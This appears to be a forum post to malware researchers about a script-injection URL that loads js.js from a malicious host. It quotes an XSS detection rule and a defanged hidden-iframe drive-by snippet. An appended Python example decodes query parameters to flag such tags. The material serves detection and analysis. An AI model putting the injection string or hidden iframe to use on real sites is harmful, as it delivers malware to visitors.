Hi malware fighters,
Look here how it was performed: http://www.webhostingtalk.com/showthread.php?t=626444
I give this in at Google:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:" tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)
=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=<script+src%3Dhttp%3A%2F%2Fexport.webservicessl.ru%2Fjs.js>&ie=utf-8&oe=utf-8&aq=t
What is this js.js malware? See: http://www.google.com/safebrowsing/diagnostic?site=http%3A//export.webservicessl.ru/js.js
See: http://jsunpack.jeek.org/dec/go?report=f657a77d0501a9cb52516346fd69dfcc8da15ccb
You get this here:
^iframe src=htxp://letter.kafeira.com:8080/index.php?pid=6 width=0 height=0 frameborder=0^^/iframe>")}catch(e){}}= "error code to get an SQL" pol
Expired site now used for malicious purposes:
kafeiracom - wXw.kafeiracom
Malware folks, more and more malware…
polonus
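
Added example, not part of the original post and not the code of the tool that raised the alert: a Python check that decodes each query parameter before looking for a script tag and reports the external host it would load from. It goes beyond the quoted rule by also catching a raw `<` and nested percent-encoding; the function names, the decode limit and the sample URLs (hosts under example.test) are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

PAGE_RULE_RE = re.compile(r"%3Cscript.*%3E", re.IGNORECASE)  # url_re quoted in the post
SCRIPT_TAG = re.compile(r"<\s*script\b([^>]*)", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^\s"'>]+)""", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap nested percent-encoding


def fully_decode(value):
    """Percent-decode until stable, so %253Cscript and %3Cscript both become <script."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_script_injection(url):
    """Return one finding per query parameter whose decoded value has a <script tag."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        tag = SCRIPT_TAG.search(fully_decode(value))
        if not tag:
            continue
        src = SRC_ATTR.search(tag.group(1))
        src_url = src.group(1) if src else None
        # hostname is None for an inline script or a relative src
        host = urlsplit(src_url).hostname if src_url else None
        findings.append({"param": name, "src": src_url, "host": host})
    return findings


# Constructed samples with the same shape as the request URL in the post.
SAMPLE_RAW = ("http://search.example.test/search?client=flock"
              "&q=<script+src%3Dhttp%3A%2F%2Fjs.example.test%2Fjs.js>&ie=utf-8")
SAMPLE_DOUBLE = "http://search.example.test/search?q=%253CSCRIPT%253E"
SAMPLE_BENIGN = "http://search.example.test/search?q=javascript+tutorial"

if __name__ == "__main__":
    for sample in (SAMPLE_RAW, SAMPLE_DOUBLE, SAMPLE_BENIGN):
        # Third column: whether the literal url_re from the post matches the raw URL.
        print(find_script_injection(sample), bool(PAGE_RULE_RE.search(sample)))
```

The pattern from the post only matches a single-encoded `%3Cscript`, so decoding first is what lets the raw and double-encoded variants be flagged as well.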